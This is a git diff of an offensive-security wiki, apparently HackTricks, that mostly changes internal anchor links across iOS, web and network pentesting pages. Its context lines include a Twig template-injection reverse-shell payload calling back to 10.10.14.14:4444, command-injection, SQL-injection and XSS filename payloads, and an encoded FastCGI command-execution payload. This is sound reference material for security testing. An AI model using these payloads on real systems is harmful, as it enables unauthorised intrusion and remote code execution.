- [ ] [**Keychain**](ios-pentesting/index.html#keychain) is usually used to store sensitive information that can be left when reselling the phone.
- [ ] In summary, just **check for sensitive information saved by the application in the filesystem**
### Keyboards
- [ ] Does the application [**allow to use custom keyboards**](ios-pentesting/#custom-keyboards-keyboard-cache)?
- [ ] Check if sensitive information is saved in the [**keyboards cache files**](ios-pentesting/#custom-keyboards-keyboard-cache)
- [ ] Does the application [**allow to use custom keyboards**](ios-pentesting/index.html#custom-keyboards-keyboard-cache)?
- [ ] Check if sensitive information is saved in the [**keyboards cache files**](ios-pentesting/index.html#custom-keyboards-keyboard-cache)
### **Logs**
- [ ] Check if [**sensitive information is being logged**](ios-pentesting/#logs)
- [ ] Check if [**sensitive information is being logged**](ios-pentesting/index.html#logs)
### Backups
- [ ] [**Backups**](ios-pentesting/#backups) can be used to **access the sensitive information** saved in the file system (check the initial point of this checklist)
- [ ] Also, [**backups**](ios-pentesting/#backups) can be used to **modify some configurations of the application**, then **restore** the backup on the phone, and the as the **modified configuration** is **loaded** some (security) **functionality** may be **bypassed**
- [ ] [**Backups**](ios-pentesting/index.html#backups) can be used to **access the sensitive information** saved in the file system (check the initial point of this checklist)
- [ ] Also, [**backups**](ios-pentesting/index.html#backups) can be used to **modify some configurations of the application**, then **restore** the backup on the phone, and the as the **modified configuration** is **loaded** some (security) **functionality** may be **bypassed**
### **Applications Memory**
- [ ] Check for sensitive information inside the [**application's memory**](ios-pentesting/#testing-memory-for-sensitive-data)
- [ ] Check for sensitive information inside the [**application's memory**](ios-pentesting/index.html#testing-memory-for-sensitive-data)
### **Broken Cryptography**
- [ ] Check if yo can find [**passwords used for cryptography**](ios-pentesting/#broken-cryptography)
- [ ] Check for the use of [**deprecated/weak algorithms**](ios-pentesting/#broken-cryptography) to send/store sensitive data
- [ ] [**Hook and monitor cryptography functions**](ios-pentesting/#broken-cryptography)
- [ ] Check if yo can find [**passwords used for cryptography**](ios-pentesting/index.html#broken-cryptography)
- [ ] Check for the use of [**deprecated/weak algorithms**](ios-pentesting/index.html#broken-cryptography) to send/store sensitive data
- [ ] [**Hook and monitor cryptography functions**](ios-pentesting/index.html#broken-cryptography)
### **Local Authentication**
- [ ] If a [**local authentication**](ios-pentesting/#local-authentication) is used in the application, you should check how the authentication is working.
- [ ] If it's using the [**Local Authentication Framework**](ios-pentesting/#local-authentication-framework) it could be easily bypassed
- [ ] If it's using a [**function that can dynamically bypassed**](ios-pentesting/#local-authentication-using-keychain) you could create a custom frida script
- [ ] If a [**local authentication**](ios-pentesting/index.html#local-authentication) is used in the application, you should check how the authentication is working.
- [ ] If it's using the [**Local Authentication Framework**](ios-pentesting/index.html#local-authentication-framework) it could be easily bypassed
- [ ] If it's using a [**function that can dynamically bypassed**](ios-pentesting/index.html#local-authentication-using-keychain) you could create a custom frida script
### Sensitive Functionality Exposure Through IPC
- [**Custom URI Handlers / Deeplinks / Custom Schemes**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes)
- [**Custom URI Handlers / Deeplinks / Custom Schemes**](ios-pentesting/index.html#custom-uri-handlers-deeplinks-custom-schemes)
- [ ] Check if the application is **registering any protocol/scheme**
- [ ] Check if the application is **registering to use** any protocol/scheme
- [ ] Check if the application **expects to receive any kind of sensitive information** from the custom scheme that can be **intercepted** by the another application registering the same scheme
- [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited**
- [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme
- [**Universal Links**](ios-pentesting/#universal-links)
- [**Universal Links**](ios-pentesting/index.html#universal-links)
- [ ] Check if the application is **registering any universal protocol/scheme**
- [ ] Check the `apple-app-site-association` file
- [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited**
@ -81,14 +81,14 @@
### Network Communication
- [ ] Perform a [**MitM to the communication**](ios-pentesting/#network-communication) and search for web vulnerabilities.
- [ ] Check if the [**hostname of the certificate**](ios-pentesting/#hostname-check) is checked
- [ ] Check/Bypass [**Certificate Pinning**](ios-pentesting/#certificate-pinning)
- [ ] Perform a [**MitM to the communication**](ios-pentesting/index.html#network-communication) and search for web vulnerabilities.
- [ ] Check if the [**hostname of the certificate**](ios-pentesting/index.html#hostname-check) is checked
- [ ] Check/Bypass [**Certificate Pinning**](ios-pentesting/index.html#certificate-pinning)
### **Misc**
- [ ] Check for [**automatic patching/updating**](ios-pentesting/#hot-patching-enforced-updateing) mechanisms
- [ ] Check for [**malicious third party libraries**](ios-pentesting/#third-parties)
- [ ] Check for [**automatic patching/updating**](ios-pentesting/index.html#hot-patching-enforced-updateing) mechanisms
- [ ] Check for [**malicious third party libraries**](ios-pentesting/index.html#third-parties)
{{#include ../banners/hacktricks-training.md}}

2
src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View File

@ -65,7 +65,7 @@ PORT = 1883
def on_connect(client, userdata, flags, rc):
client.subscribe('#', qos=1)
client.subscribe('$SYS/#')
client.subscribe('$SYS/index.html#')
def on_message(client, userdata, message):
print('Topic: %s | QOS: %s | Message: %s' % (message.topic, message.qos, message.payload))

2
src/network-services-pentesting/2375-pentesting-docker.md
View File

@ -215,7 +215,7 @@ cat /mnt/etc/shadow
### Privilege Escalation
If you are inside a host that is using docker, you may [**read this information to try to elevate privileges**](../linux-hardening/privilege-escalation/#writable-docker-socket).
If you are inside a host that is using docker, you may [**read this information to try to elevate privileges**](../linux-hardening/privilege-escalation/index.html#writable-docker-socket).
### Discovering secrets in running Docker containers

2
src/network-services-pentesting/5601-pentesting-kibana.md
View File

@ -14,7 +14,7 @@ Once access to Kibana is secured, several actions are advisable:
- Exploring data from Elasticsearch should be a priority.
- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys.
- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)).
- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/index.html#ref2)).
## SSL/TLS Considerations

2
src/network-services-pentesting/pentesting-smb/README.md
View File

@ -514,7 +514,7 @@ Which are used by some browsers and tools (like Skype)
## NTLM Theft
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack).
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](#smb-relay-attack).
[See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)

2
src/network-services-pentesting/pentesting-ssh.md
View File

@ -179,7 +179,7 @@ If you are in the local network as the victim which is going to connect to the S
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) does exactly what is described above.
In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/#spoofing).
In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
## SSH-Snake

2
src/network-services-pentesting/pentesting-voip/README.md
View File

@ -327,7 +327,7 @@ sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
### VoIP Sniffing
If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.
If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.
Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more.

2
src/network-services-pentesting/pentesting-web/bolt-cms.md
View File

@ -14,7 +14,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in
- Select `File management` -> `View & edit templates`
- Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`
- In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
- Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
- Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
- And save changes
<figure><img src="../../images/image (948).png" alt=""><figcaption></figcaption></figure>

2
src/network-services-pentesting/pentesting-web/flask.md
View File

@ -72,7 +72,7 @@ https://github.com/Tagvi/ripsession
### SQLi in Flask session cookie with SQLmap
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
[**This example**](../../pentesting-web/sql-injection/sqlmap/index.html#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
## Flask Proxy to SSRF

2
src/network-services-pentesting/pentesting-web/joomla.md
View File

@ -81,7 +81,7 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
droopescan scan joomla --url http://joomla-site.local/
```
In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](#cms-scanners) that can scan Joomla.
### API Unauthenticated Information Disclosure:

4
src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
View File

@ -308,7 +308,7 @@ Different .htaccess shells can be found [here](https://github.com/wireghoul/htsh
If you find a vulnerability that allows you to **modify env variables in PHP** (and another one to upload files, although with more research maybe this can be bypassed), you could abuse this behaviour to get **RCE**.
- [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld_preload-and-ld_library_path): This env variable allows you load arbitrary libraries when executing other binaries (although in this case it might not work).
- [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/index.html#ld_preload-and-ld_library_path): This env variable allows you load arbitrary libraries when executing other binaries (although in this case it might not work).
- **`PHPRC`** : Instructs PHP on **where to locate its configuration file**, usually called `php.ini`. If you can upload your own config file, then, use `PHPRC` to point PHP at it. Add an **`auto_prepend_file`** entry specifying a second uploaded file. This second file contains normal **PHP code, which is then executed** by the PHP runtime before any other code.
1. Upload a PHP file containing our shellcode
2. Upload a second file, containing an **`auto_prepend_file`** directive instructing the PHP preprocessor to execute the file we uploaded in step 1
@ -373,7 +373,7 @@ You can use the **web**[ **www.unphp.net**](http://www.unphp.net) **to deobfusca
## PHP Wrappers & Protocols
PHP Wrappers ad protocols could allow you to **bypass write and read protections** in a system and compromise it. For [**more information check this page**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols).
PHP Wrappers ad protocols could allow you to **bypass write and read protections** in a system and compromise it. For [**more information check this page**](../../../pentesting-web/file-inclusion/index.html#lfi-rfi-using-php-wrappers-and-protocols).
## Xdebug unauthenticated RCE

2
src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
View File

@ -37,7 +37,7 @@ Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a paylo
![](<../../../../images/image (227).png>)
Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). And then copy/pasting the abse64 in this php code:
Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/index.html#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). And then copy/pasting the abse64 in this php code:
```php
<?php

2
src/network-services-pentesting/pentesting-web/tomcat/README.md
View File

@ -115,7 +115,7 @@ Finally, if you have access to the Tomcat Web Application Manager, you can **upl
### Limitations
You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section).
You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](#post)section).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

2
src/pentesting-web/browser-extension-pentesting-methodology/README.md
View File

@ -433,7 +433,7 @@ Where it's needed to mention the **extension ID**.
### Native Messaging
It's possible for the background scripts to communicate with binaries inside the system, which might be **prone to critical vulnerabilities such as RCEs** if this communication is not properly secured. [More on this later](./#native-messaging).
It's possible for the background scripts to communicate with binaries inside the system, which might be **prone to critical vulnerabilities such as RCEs** if this communication is not properly secured. [More on this later](#native-messaging).
```javascript
chrome.runtime.sendNativeMessage(

4
src/pentesting-web/cache-deception/README.md
View File

@ -156,7 +156,7 @@ Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/explo
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
### Automated testing for Web Cache Poisoning
@ -223,7 +223,7 @@ Then, the **attacker** can access _http://www.example.com/home.php/non-existent.
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
## Automatic Tools

4
src/pentesting-web/csrf-cross-site-request-forgery.md
View File

@ -24,7 +24,7 @@ You could **capture the request in Burp** and check CSRF protections and to test
Several countermeasures can be implemented to protect against CSRF attacks:
- [**SameSite cookies**](hacking-with-cookies/#samesite): This attribute prevents the browser from sending cookies along with cross-site requests. [More about SameSite cookies](hacking-with-cookies/#samesite).
- [**SameSite cookies**](hacking-with-cookies/index.html#samesite): This attribute prevents the browser from sending cookies along with cross-site requests. [More about SameSite cookies](hacking-with-cookies/index.html#samesite).
- [**Cross-origin resource sharing**](cors-bypass.md): The CORS policy of the victim site can influence the feasibility of the attack, especially if the attack requires reading the response from the victim site. [Learn about CORS bypass](cors-bypass.md).
- **User Verification**: Prompting for the user's password or solving a captcha can confirm the user's intent.
- **Checking Referrer or Origin Headers**: Validating these headers can help ensure requests are coming from trusted sources. However, careful crafting of URLs can bypass poorly implemented checks, such as:
@ -205,7 +205,7 @@ Therefore, if a GET request is being limited, you could just **send a HEAD reque
### **Exfiltrating CSRF Token**
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/index.html#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
### **GET using HTML tags**

2
src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
View File

@ -243,7 +243,7 @@ ss-leaks.md
## XS-Search/XS-Leaks
XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](../xs-search/#css-injection) or [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**
XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](../xs-search/index.html#css-injection) or [**Lazy Load Images**](../xs-search/index.html#image-lazy-loading)**.**
{{#ref}}
../xs-search/

2
src/pentesting-web/file-inclusion/README.md
View File

@ -480,7 +480,7 @@ For the technical details check the mentioned post!
### Remote File Inclusion
Explained previously, [**follow this link**](./#remote-file-inclusion).
Explained previously, [**follow this link**](#remote-file-inclusion).
### Via Apache/Nginx log file

4
src/pentesting-web/file-upload/README.md
View File

@ -172,8 +172,8 @@ Note that **another option** you may be thinking of to bypass this check is to m
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\*

2
src/pentesting-web/hacking-with-cookies/README.md
View File

@ -68,7 +68,7 @@ This avoids the **client** to access the cookie (Via **Javascript** for example:
cookie-jar-overflow.md
{{#endref}}
- It's possible to use [**Cookie Smuggling**](./#cookie-smuggling) attack to exfiltrate these cookies
- It's possible to use [**Cookie Smuggling**](#cookie-smuggling) attack to exfiltrate these cookies
### Secure

4
src/pentesting-web/http-request-smuggling/README.md
View File

@ -270,7 +270,7 @@ Identifying HTTP request smuggling vulnerabilities can often be achieved using t
### HTTP Request Smuggling Vulnerability Testing
After confirming the effectiveness of timing techniques, it's crucial to verify if client requests can be manipulated. A straightforward method is to attempt poisoning your requests, for instance, making a request to `/` yield a 404 response. The `CL.TE` and `TE.CL` examples previously discussed in [Basic Examples](./#basic-examples) demonstrate how to poison a client's request to elicit a 404 response, despite the client aiming to access a different resource.
After confirming the effectiveness of timing techniques, it's crucial to verify if client requests can be manipulated. A straightforward method is to attempt poisoning your requests, for instance, making a request to `/` yield a 404 response. The `CL.TE` and `TE.CL` examples previously discussed in [Basic Examples](#basic-examples) demonstrate how to poison a client's request to elicit a 404 response, despite the client aiming to access a different resource.
**Key Considerations**
@ -495,7 +495,7 @@ In this scenario, a user's request for a JavaScript file is hijacked. The attack
Web cache poisoning can be executed if any component of the **front-end infrastructure caches content**, typically to enhance performance. By manipulating the server's response, it's possible to **poison the cache**.
Previously, we observed how server responses could be altered to return a 404 error (refer to [Basic Examples](./#basic-examples)). Similarly, its feasible to trick the server into delivering `/index.html` content in response to a request for `/static/include.js`. Consequently, the `/static/include.js` content gets replaced in the cache with that of `/index.html`, rendering `/static/include.js` inaccessible to users, potentially leading to a Denial of Service (DoS).
Previously, we observed how server responses could be altered to return a 404 error (refer to [Basic Examples](#basic-examples)). Similarly, its feasible to trick the server into delivering `/index.html` content in response to a request for `/static/include.js`. Consequently, the `/static/include.js` content gets replaced in the cache with that of `/index.html`, rendering `/static/include.js` inaccessible to users, potentially leading to a Denial of Service (DoS).
This technique becomes particularly potent if an **Open Redirect vulnerability** is discovered or if there's an **on-site redirect to an open redirect**. Such vulnerabilities can be exploited to replace the cached content of `/static/include.js` with a script under the attacker's control, essentially enabling a widespread Cross-Site Scripting (XSS) attack against all clients requesting the updated `/static/include.js`.

2
src/pentesting-web/login-bypass/README.md
View File

@ -25,7 +25,7 @@ If you find a login page, here you can find some techniques to try to bypass it:
### SQL Injection authentication bypass
[Here you can find several tricks to bypass the login via **SQL injections**](../sql-injection/#authentication-bypass).
[Here you can find several tricks to bypass the login via **SQL injections**](../sql-injection/index.html#authentication-bypass).
In the following page you can find a **custom list to try to bypass login** via SQL Injections:

2
src/pentesting-web/postmessage-vulnerabilities/README.md
View File

@ -228,7 +228,7 @@ For **more information**:
- Link to page about [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/)
- Link to page about [**XSS**](../xss-cross-site-scripting/)
- Link to page about [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
- Link to page about [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
## References

2
src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
View File

@ -16,7 +16,7 @@ If he does, he can send a **postmessage** with HTML content that is going to be
The way to bypass the **first check** is by making **`window.calc.contentWindow`** to **`undefined`** and **`e.source`** to **`null`**:
- **`window.calc.contentWindow`** is actually **`document.getElementById("calc")`**. You can clobber **`document.getElementById`** with **`<img name=getElementById />`** (note that Sanitizer API -[here](https://wicg.github.io/sanitizer-api/#dom-clobbering)- is not configured to protect against DOM clobbering attacks in its default state).
- **`window.calc.contentWindow`** is actually **`document.getElementById("calc")`**. You can clobber **`document.getElementById`** with **`<img name=getElementById />`** (note that Sanitizer API -[here](https://wicg.github.io/sanitizer-api/index.html#dom-clobbering)- is not configured to protect against DOM clobbering attacks in its default state).
- Therefore, you can clobber **`document.getElementById("calc")`** with **`<img name=getElementById /><div id=calc></div>`**. Then, **`window.calc`** will be **`undefined`**.
- Now, we need **`e.source`** to be **`undefined`** or **`null`** (because `==` is used instead of `===`, **`null == undefined`** is **`True`**). Getting this is "easy". If you create an **iframe** and **send** a **postMessage** from it and immediately **remove** the iframe, **`e.origin`** is going to be **`null`**. Check the following code

2
src/pentesting-web/registration-vulnerabilities.md
View File

@ -27,7 +27,7 @@ In that case you may try to bruteforce credentials.
### SQL Injection
[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms.
[**Check this page** ](sql-injection/index.html#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms.
### Oauth Takeovers

2
src/pentesting-web/sql-injection/README.md
View File

@ -241,7 +241,7 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
## Exploiting Time Based SQLi
In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
